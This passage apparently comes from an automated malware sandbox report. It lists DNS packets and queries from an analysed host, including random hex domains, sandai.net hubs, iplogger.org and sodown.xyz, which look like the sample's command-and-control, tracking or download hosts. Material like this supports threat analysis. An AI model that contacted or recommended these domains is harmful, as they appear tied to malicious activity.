                                                                                                                                                  Dec 5, 2020 08:44:48.825647116 CET53630328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET5489853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.344616890 CET53548988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET6171053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.886678934 CET53617108.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET5207353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.418781042 CET53520738.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET6394953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.942514896 CET53639498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET5756153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.481712103 CET53575618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET5320553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.997468948 CET53532058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET6057953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:52.558666945 CET53605798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET4976553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.074649096 CET53497658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET5765053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.599467039 CET53576508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET6531753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.122626066 CET53653178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET6465453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.661765099 CET53646548.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET5119153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.192456961 CET53511918.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET6387053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.715823889 CET53638708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET5701353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.262578964 CET53570138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET5874553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.783624887 CET53587458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET6427253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.337253094 CET53642728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET5644053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.857445002 CET53564408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET5949253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.405559063 CET53594928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET6212553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.950757980 CET53621258.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET6177653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:59.481197119 CET53617768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET5392853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.024873018 CET53539288.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET5105853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.559737921 CET53510588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET5671153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.093219995 CET53567118.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET5478053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.625252962 CET53547808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET5430553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.171911955 CET53543058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.184005022 CET6166953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.211256981 CET53616698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.556096077 CET5733653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.599622011 CET53573368.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET6457753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.725611925 CET53645778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET6498753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.235282898 CET5865553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.248840094 CET53649878.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.285640955 CET53586558.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.666244030 CET6090553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.701962948 CET53609058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET6277653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.764144897 CET53627768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.883415937 CET5692353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.919194937 CET53569238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET6520153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.294631958 CET53652018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET5426453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.810632944 CET53542648.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET5843953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:05.357727051 CET53584398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:05.877887964 CET5423553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:05.905102015 CET53542358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:06.407953024 CET5587653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:06.435257912 CET53558768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:06.940469980 CET5699453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:06.967833042 CET53569948.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:07.470385075 CET5883253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:07.497612953 CET53588328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:07.985903025 CET5180053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:08.013257027 CET53518008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:08.503778934 CET5883653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:08.530966997 CET53588368.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:09.033617020 CET6466953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:09.060971022 CET53646698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:09.566113949 CET6473553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:09.593342066 CET53647358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:10.112205029 CET5247253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:10.139463902 CET53524728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:10.626859903 CET5169753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:10.654100895 CET53516978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:11.142332077 CET6302053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:11.169487953 CET53630208.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:11.676170111 CET5985353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:11.703306913 CET53598538.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:12.206394911 CET6219653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:12.233783007 CET53621968.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:12.737648010 CET5070053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:12.765013933 CET53507008.8.8.8192.168.2.3

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  Dec 5, 2020 08:43:49.899223089 CET192.168.2.38.8.8.8d02d(Port unreachable)Destination Unreachable

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Dec 5, 2020 08:41:53.342662096 CET192.168.2.38.8.8.80x92a9Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.059262991 CET192.168.2.38.8.8.80xbe88Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.375412941 CET192.168.2.38.8.8.80x2421Standard query (0)1c5491a87d65f1ef.clubA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.374576092 CET192.168.2.38.8.8.80xf72fStandard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.014781952 CET192.168.2.38.8.8.80x34d3Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.564450026 CET192.168.2.38.8.8.80xdb46Standard query (0)EF6DF4AF06BA6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.052850008 CET192.168.2.38.8.8.80x79fcStandard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.052906036 CET192.168.2.38.8.8.80x6bfcStandard query (0)hub5pn.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.448940039 CET192.168.2.38.8.8.80x600aStandard query (0)hub5u.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.488394976 CET192.168.2.38.8.8.80x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.492825985 CET192.168.2.38.8.8.80x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.497859001 CET192.168.2.38.8.8.80x7c2Standard query (0)dream.picsA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.503201962 CET192.168.2.38.8.8.80x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.507247925 CET192.168.2.38.8.8.80x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.886359930 CET192.168.2.38.8.8.80xf80fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.924384117 CET192.168.2.38.8.8.80x6951Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:47.464710951 CET192.168.2.38.8.8.80xe8e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.010875940 CET192.168.2.38.8.8.80x1a3aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.114943027 CET192.168.2.38.8.8.80x7c5Standard query (0)hub5sr.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.118016005 CET192.168.2.38.8.8.80x7c6Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.121144056 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.124800920 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.469470978 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.470809937 CET192.168.2.38.8.8.80xfb24Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.506843090 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.508157969 CET192.168.2.38.8.8.80xeaf4Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.541522980 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.542855978 CET192.168.2.38.8.8.80x5596Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.557689905 CET192.168.2.38.8.8.80x7b6aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.578788042 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.580691099 CET192.168.2.38.8.8.80x88b9Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.616544008 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.617836952 CET192.168.2.38.8.8.80xe1d0Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654639006 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.656128883 CET192.168.2.38.8.8.80x6fbStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.692184925 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.693607092 CET192.168.2.38.8.8.80x621fStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.105391026 CET192.168.2.38.8.8.80xfec2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.510230064 CET192.168.2.38.8.8.80xeaf4Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.546184063 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.547491074 CET192.168.2.38.8.8.80x20dbStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.651437044 CET192.168.2.38.8.8.80xb67Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.932180882 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.933799028 CET192.168.2.38.8.8.80xe49bStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.971388102 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.973582029 CET192.168.2.38.8.8.80x709aStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.183084011 CET192.168.2.38.8.8.80xd672Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.730550051 CET192.168.2.38.8.8.80x7fcdStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.276849031 CET192.168.2.38.8.8.80x2599Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.823340893 CET192.168.2.38.8.8.80x1fafStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.408591986 CET192.168.2.38.8.8.80x7d31Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.955682993 CET192.168.2.38.8.8.80x3923Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:56.625580072 CET192.168.2.38.8.8.80x7a6dStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:57.236421108 CET192.168.2.38.8.8.80xd060Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.803669930 CET192.168.2.38.8.8.80x27c6Standard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.804709911 CET192.168.2.38.8.8.80x49b7Standard query (0)hub5pn.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.846127987 CET192.168.2.38.8.8.80xceb2Standard query (0)hub5u.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.857948065 CET192.168.2.38.8.8.80x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.864092112 CET192.168.2.38.8.8.80x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.870414019 CET192.168.2.38.8.8.80x7c2Standard query (0)www.sodown.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.875919104 CET192.168.2.38.8.8.80x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.884202003 CET192.168.2.38.8.8.80x8e07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.885776997 CET192.168.2.38.8.8.80x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921621084 CET192.168.2.38.8.8.80x1789Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.448873997 CET192.168.2.38.8.8.80x3d74Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.980581999 CET192.168.2.38.8.8.80xdf01Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.497203112 CET192.168.2.38.8.8.80xbe4bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.016016006 CET192.168.2.38.8.8.80x841dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.558756113 CET192.168.2.38.8.8.80xf3dbStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.765913963 CET192.168.2.38.8.8.80x7c5Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.769349098 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.771750927 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.805136919 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.806685925 CET192.168.2.38.8.8.80x7007Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.807689905 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.810213089 CET192.168.2.38.8.8.80xaafdStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.847259045 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.848738909 CET192.168.2.38.8.8.80x297bStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.885165930 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.886617899 CET192.168.2.38.8.8.80xbbbaStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922816038 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.923988104 CET192.168.2.38.8.8.80x9cd7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.959923029 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.961081028 CET192.168.2.38.8.8.80x95a8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.075781107 CET192.168.2.38.8.8.80x112dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.258651018 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.260009050 CET192.168.2.38.8.8.80x4483Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.296370983 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.297508955 CET192.168.2.38.8.8.80x527Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.333282948 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.334471941 CET192.168.2.38.8.8.80xac55Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.371311903 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.373500109 CET192.168.2.38.8.8.80x3d9bStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.606443882 CET192.168.2.38.8.8.80xcc35Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.137140989 CET192.168.2.38.8.8.80x833dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.686932087 CET192.168.2.38.8.8.80x75f8Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.230811119 CET192.168.2.38.8.8.80xdb3cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.763760090 CET192.168.2.38.8.8.80xd7ecStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.314198017 CET192.168.2.38.8.8.80x4d11Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.840318918 CET192.168.2.38.8.8.80xfc5cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.373202085 CET192.168.2.38.8.8.80x9a51Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.904190063 CET192.168.2.38.8.8.80x5ca0Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.454602003 CET192.168.2.38.8.8.80x7e7fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.996587992 CET192.168.2.38.8.8.80x30c1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:08.543495893 CET192.168.2.38.8.8.80xe50bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.090739965 CET192.168.2.38.8.8.80x44d1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.623686075 CET192.168.2.38.8.8.80xef1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.154020071 CET192.168.2.38.8.8.80xd095Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.701011896 CET192.168.2.38.8.8.80x7ed4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.232388973 CET192.168.2.38.8.8.80xa443Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.779169083 CET192.168.2.38.8.8.80xbcd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:12.556914091 CET192.168.2.38.8.8.80xe663Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:13.165429115 CET192.168.2.38.8.8.80x711dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.356935978 CET192.168.2.38.8.8.80x2267Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.888703108 CET192.168.2.38.8.8.80x9788Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.421914101 CET192.168.2.38.8.8.80xdcafStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
